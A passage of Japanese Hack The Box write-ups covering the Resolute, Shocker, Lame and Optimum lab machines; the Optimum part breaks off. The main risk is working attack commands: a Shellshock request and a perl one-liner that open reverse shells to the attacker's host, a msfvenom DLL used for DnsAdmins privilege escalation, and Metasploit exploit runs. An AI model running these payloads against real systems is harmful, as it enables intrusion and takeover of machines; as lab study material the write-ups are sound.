administering the computer/domain | Flags: Password does not expire, Normal user account | MEGABANK\angela (RID: 6606) | Flags: Normal user account | MEGABANK\annette (RID: 6614) | Flags: Normal user account | MEGABANK\annika (RID: 6615) | Flags: Normal user account | MEGABANK\claire (RID: 6611) | Flags: Normal user account | MEGABANK\claude (RID: 6617) | Flags: Normal user account | MEGABANK\DefaultAccount (RID: 503) | Description: A user account managed by the system. | Flags: Password not required, Account disabled, Password does not expire, Normal user account | MEGABANK\felicia (RID: 6607) | Flags: Normal user account | MEGABANK\fred (RID: 6605) | Flags: Normal user account | MEGABANK\Guest (RID: 501) | Description: Built-in account for guest access to the computer/domain | Flags: Password not required, Account disabled, Password does not expire, Normal user account | MEGABANK\gustavo (RID: 6608) | Flags: Normal user account | MEGABANK\krbtgt (RID: 502) | Description: Key Distribution Center Service Account | Flags: Account disabled, Normal user account | MEGABANK\marcus (RID: 6603) | Flags: Normal user account | MEGABANK\marko (RID: 1111) | Full name: Marko Novak | Description: Account created. Password set to Welcome123! | Flags: Password does not expire, Normal user account | MEGABANK\melanie (RID: 10101) | Flags: Normal user account | MEGABANK\naoki (RID: 10104) | Flags: Normal user account | MEGABANK\paulo (RID: 6612) | Flags: Normal user account | MEGABANK\per (RID: 6616) | Flags: Normal user account | MEGABANK\ryan (RID: 1105) | Full name: Ryan Bertrand |_ Flags: Password does not expire, Normal user account
markoのDescriptionの欄に、Account created. Password set to Welcome123!と記載があり、かなり怪しい。
smb login attempt
marko/Welcome123!の認証情報でsmbclientを使って、ログインを試す。
$ smbclient -U marko -L 10.10.10.169 WARNING: The "syslog" option is deprecated Enter WORKGROUP\marko's password: session setup failed: NT_STATUS_LOGON_FAILURE
どうもダメっぽい、、、 どうせなら、全ユーザで辞書攻撃をしてみる。
$ hydra -L userlist.txt -p Welcome123! 10.10.10.169 smb Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2020-05-09 10:54:01 [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) [DATA] max 1 task per 1 server, overall 1 task, 27 login tries (l:27/p:1), ~27 tries per task [DATA] attacking smb://10.10.10.169:445/ [445][smb] host: 10.10.10.169 login: melanie password: Welcome123! 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2020-05-09 10:54:19
melanieアカウントでヒットした!
smbclientで再度ログイン。
$ smbclient -U melanie -L 10.10.10.169 WARNING: The "syslog" option is deprecated Enter WORKGROUP\melanie's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share $ smbclient -U melanie \\\\10.10.10.169\\NETLOGON WARNING: The "syslog" option is deprecated Enter WORKGROUP\melanie's password: smb: \> ls . D 0 Wed Sep 25 22:28:21 2019 .. D 0 Wed Sep 25 22:28:21 2019 10340607 blocks of size 4096. 7561451 blocks available
ログイン成功! NETLOGONには何も見当たらなかったので、SYSVOLへログイン。
$ smbclient -U melanie \\\\10.10.10.169\\SYSVOL WARNING: The "syslog" option is deprecated Enter WORKGROUP\melanie's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 25 22:28:21 2019 .. D 0 Wed Sep 25 22:28:21 2019 megabank.local D 0 Wed Sep 25 22:28:21 2019
megabank.local下のディレクトリをダウンロードしてきたが、特に情報が見当たらない。
$ tree ./ ./ ├── {31B2F340-016D-11D2-945F-00C04FB984F9} │ ├── GPT.INI │ ├── MACHINE │ │ ├── Microsoft │ │ │ └── Windows NT │ │ │ └── SecEdit │ │ │ └── GptTmpl.inf │ │ └── Scripts │ │ ├── Shutdown │ │ └── Startup │ └── USER ├── {6AC1786C-016F-11D2-945F-00C04fB984F9} │ ├── GPT.INI │ ├── MACHINE │ │ └── Microsoft │ │ └── Windows NT │ │ └── SecEdit │ │ └── GptTmpl.inf │ └── USER ├── nmap_sV_fullport.txt └── userlist.txt
入手したクレデンシャルで、サーバからさらに情報取得を試みる。
ldapdomaindumpを使う$ ldapdomaindump -u MEGABANK\\melanie -p Welcome123! 10.10.10.169 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished $ firefox *.html
ldapサーバの各種情報をダンプしてくれる。 malanieはRemote Management Usersグループに所属している。Remote Managementというのは、その名の通り、リモートでサーバをマネジメントできる機能でWindows Server 2016以降ではデフォルトでenableになっている。デフォルトのポートは5985/tcp。
Exploit
Remote Management用のshellツールを使ってアクセスする。
$ ./evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> *Evil-WinRM* PS C:\Users\melanie\Desktop> ls Directory: C:\Users\melanie\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/3/2019 7:33 AM 32 user.txt
目的のファイルを発見、フラグゲット!!
local recon
他のユーザディレクトリがあるかチェック。ryanというユーザがいるよう。
PS C:\Users\melanie\Documents> ls ../../ Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/25/2019 10:43 AM Administrator d----- 12/4/2019 2:46 AM melanie d-r--- 11/20/2016 6:39 PM Public d----- 9/27/2019 7:05 AM ryan
C直下に隠しディレクトリが存在し、その下にはtranscriptが存在する。transcryptとは、PowerShellのログをテキストファイルに書き出したもの。!!directory walkingは大事!!
*Evil-WinRM* PS C:\> dir -hidden Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 5/10/2020 8:35 PM 402653184 pagefile.sys *Evil-WinRM* PS C:\> cd PSTranscripts *Evil-WinRM* PS C:\PSTranscripts> dir -hidden Directory: C:\PSTranscripts Mode LastWriteTime Length Name ---- ------------- ------ ---- d--h-- 12/3/2019 6:45 AM 20191203 *Evil-WinRM* PS C:\PSTranscripts> cd 20191203 *Evil-WinRM* PS C:\PSTranscripts\20191203> dir -hidden Directory: C:\PSTranscripts\20191203 Mode LastWriteTime Length Name ---- ------------- ------ ---- -arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
中を見ると、ryanはbackupディレクトリをマウントしたログが残っている。パスワードがコマンドライン引数で渡されている。
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
ryanアカウントでログインできた。
$ /opt/evil-winrm/evil-winrm.rb -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> whoami megabank\ryan
ryanはContractorsで、DnsAdminsのグループに所属している。'dnsadmin exploid'でぐぐると権限昇格の記事がヒットした。リバースシェルを呼び出すdllをdnsのプロセスに読ませるらしい。記事通りdllを作って、
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -f dll > privesc.dll
自分の手元でSMBサーバ立てて、
$ python3 /opt/impacket/examples/smbserver.py share ./
リスナーをたてて、
$ nc -lvnp 4444
DLLを読み込ませて、dnsを再起動すると、
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.15.3\share\privesc.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2444 FLAGS :
リバースシェルが起動した。権限昇格完了。あとはフラグをとるだけ。
$ nc -lnvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.10.10.169 56314 received! Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system
Hack The Box shocker
shocker
tags: HTB
Easy
Procedure
enumeration
- nmap scan
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
GET / HTTP/1.1 Host: 10.10.10.56 HTTP/1.1 200 OK Date: Sat, 20 Mar 2021 23:44:56 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Fri, 22 Sep 2017 20:01:19 GMT ETag: "89-559ccac257884" Accept-Ranges: bytes Content-Length: 137 Vary: Accept-Encoding Content-Type: text/html <!DOCTYPE html> <html> <body> <h2>Don't Bug Me!</h2> <img src="bug.jpg" alt="bug" style="width:450px;height:350px;"> </body> </html>
コンテンツは見つからなかった。
- 80/tcp nikto
/opt/nikto/program/nikto.pl -h 10.10.10.56 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 + Start Time: 2021-03-20 21:19:52 (GMT9) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found. + 8862 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2021-03-20 21:53:04 (GMT9) (1992 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
特に大きな情報はなし
dirb http://10.10.10.56 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Mar 20 21:15:08 2021 URL_BASE: http://10.10.10.56/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.56/ ---- + http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294) + http://10.10.10.56/index.html (CODE:200|SIZE:137) + http://10.10.10.56/server-status (CODE:403|SIZE:299) ----------------- END_TIME: Sat Mar 20 21:30:31 2021 DOWNLOADED: 4612 - FOUND: 3
/cgi-bin/ディレクトリを発見
$ python3 dirsearch.py -e "cgi,sh,py,txt,bin" -u http://10.10.10.56/cgi-bin/ _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: cgi, sh, py, txt, bin | HTTP method: GET | Threads: 30 | Wordlist size: 10944 Error Log: /home/ubu/Downloads/dirsearch/logs/errors-21-03-04_00-49-49.log Target: http://10.10.10.56/cgi-bin/ Output File: /home/ubu/Downloads/dirsearch/reports/10.10.10.56/cgi-bin_21-03-04_00-49-51.txt [00:49:51] Starting: [00:50:06] 403 - 310B - /cgi-bin/.htaccess.sample [00:50:06] 403 - 308B - /cgi-bin/.htaccess.orig [00:50:06] 403 - 305B - /cgi-bin/.ht_wsr.txt [00:50:06] 403 - 308B - /cgi-bin/.htaccess.bak1 [00:50:06] 403 - 307B - /cgi-bin/.htaccessOLD2 [00:50:06] 403 - 306B - /cgi-bin/.htaccessOLD [00:50:06] 403 - 309B - /cgi-bin/.htaccess_extra [00:50:06] 403 - 306B - /cgi-bin/.htaccessBAK [00:50:06] 403 - 308B - /cgi-bin/.htpasswd_test [00:50:06] 403 - 308B - /cgi-bin/.htaccess.save [00:50:06] 403 - 308B - /cgi-bin/.htaccess_orig [00:50:06] 403 - 298B - /cgi-bin/.htm [00:50:06] 403 - 304B - /cgi-bin/.htpasswds [00:50:06] 403 - 305B - /cgi-bin/.httr-oauth [00:50:07] 403 - 299B - /cgi-bin/.html [00:50:07] 403 - 306B - /cgi-bin/.htaccess_sc [00:52:37] 200 - 118B - /cgi-bin/user.sh
user.shファイルを発見
GET /cgi-bin/user.sh HTTP/1.1 Host: 10.10.10.56 HTTP/1.1 200 OK Date: Sat, 20 Mar 2021 23:55:58 GMT Server: Apache/2.4.18 (Ubuntu) Content-Type: text/x-sh Content-Length: 118 Content-Type: text/plain Just an uptime test script 19:55:58 up 11:41, 0 users, load average: 0.00, 0.00, 0.00
特に何もなさそう、、、
- 80/tcp 再びnikto
$ nikto /opt/nikto/program/nikto.pl -h 10.10.10.56/cgi-bin/user.sh
誤検知で色々出てくるが、shellshockの脆弱性を発見。
GET /cgi-bin/user.sh/ HTTP/1.1 Host: 10.10.10.56 Referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; } User-Agent: () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo; Connection: close HTTP/1.1 200 OK Date: Sat, 20 Mar 2021 12:35:53 GMT Server: Apache/2.4.18 (Ubuntu) 93e4r0-CVE-2014-6278: true Connection: close Content-Type: text/x-sh Content-Length: 150 93e4r0-CVE-2014-6271: true Content-Type: text/plain Just an uptime test script 08:35:53 up 21 min, 0 users, load average: 0.00, 0.01, 0.00
exploit
- shellshockの脆弱性を使ってリバースシェルを取得 自端末でリスナーを作成
$ nc -lnvp 4445
shellshockを利用したリクエスト送信
[OSCP](https://oscp.infosecsanyam.in/shells/linux-reverse-shell-one-liner)ありがとう
GET /cgi-bin/user.sh/ HTTP/1.1 Host: 10.10.10.56 User-Agent: () { :;}; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.3 4445 >/tmp/f' Connection: close
$ whoami shelly
privilege escalation
User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl
perlがパスワードなしでroot権限で実行できる
$ whoami shelly $ sudo perl -e 'use Socket;$i="10.10.15.3";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# whoami root
Closing
- 便利なツールに感謝
Hack The Box Lame
Conclusion
Procedure
nmap
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.15.3 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
FTPはanonymousログインが有効っぽいが、データは取得できなかった。
ftp 10.10.10.3 Connected to 10.10.10.3. 220 (vsFTPd 2.3.4) Name (10.10.10.3:ubu): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK.
ftpのバージョンから脆弱性を探す。
exploit-dbにバックドアのジュールがあったので試す。msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created.
セッションが作れなかったようなので諦める。
nessusをかけてみる
creticalの内容はCVE-2008-0166に関する内容のもの。後回し。sambaについて調べる。
msf6 auxiliary(scanner/smb/smb_version) > run [*] 10.10.10.3:445 - SMB Detected (versions:1) (preferred dialect:) (signatures:optional) [*] 10.10.10.3:445 - Host could not be identified: Unix (Samba 3.0.20-Debian) [*] 10.10.10.3: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
sambaのバージョンはSamba 3.0.20-Debianである。このバージョンでエクスプロイトを探す。
msf6 auxiliary(scanner/smb/smb_version) > search Samba 3.0.20 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
RCEのモジュールが見つかった。
RCE実行
msf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 10.10.15.3:4444 [*] Command shell session 2 opened (10.10.15.3:4444 -> 10.10.10.3:37016) at 2021-01-31 10:31:40 +0900 whoami root
Closing
- Nessusで引っ掛からなくてもバージョンを調べる事は大事。
Hack The Box Optimum
Conclusion
- 古いミドルウェアは使わない
Procedure
nmap
PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS /
80/tcpにブラウザでアクセスする
nmapの情報通りHttpFileServer 2.3が動いている。
exploit dbにexploitの情報がある。metasploit moduleもあるのでそちらを使う
msf6 > search HttpFileServer 2.3 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
metapriter shellゲット
> meterpreter > getuid Server username: OPTIMUM\kostas
systeminfoを取得
C:\Users\kostas\Desktop>systeminfo Host Name: OPTIMUM OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User
Windows server 2012とOSが古いので、Windows-Exploit-Suggesterを使用する。
$ python --version Python 2.7.18 $ pip list | grep xlrd DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support xlrd 1.2.0 $ python windows-exploit-suggester.py -i systeminfo.txt -d 2021-02-13-mssb.xls [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits [*] there are now 246 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2012 R2 64-bit' [*] [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 [*] [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important [*] https://github.com/foxglovesec/RottenPotato [*] https://github.com/Kevin-Robertson/Tater [*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege [*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation [*] [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC [*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC [*] [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical [*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC [*] [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC [*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC [*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#) [*] [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC [*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC [*] [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important [*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC [*] [E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important [*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC [*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC [*] [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important [*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC [*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC [*] [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical [*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) [*] [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important [*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC [*] [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important [*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC [*] [E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical [*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC [*] [M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical [*] https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow [*] [E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important [*] https://www.exploit-db.com/exploits/37052/ -- Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052), PoC [*] [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC [*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF [*] [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical [*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC [*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC [*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC [*] [E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important [*] http://www.exploit-db.com/exploits/35661/ -- Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl), PoC [*] [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical [*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC [*] [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC [*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important [*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC [*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical [*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF [*] [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [*] done
windows server 2012に関する権限昇格の脆弱性を使用する。
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC [*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC [*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
metasploitで検索
msf6 exploit(windows/http/rejetto_hfs_exec) > search ms16-032 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
exploit実行
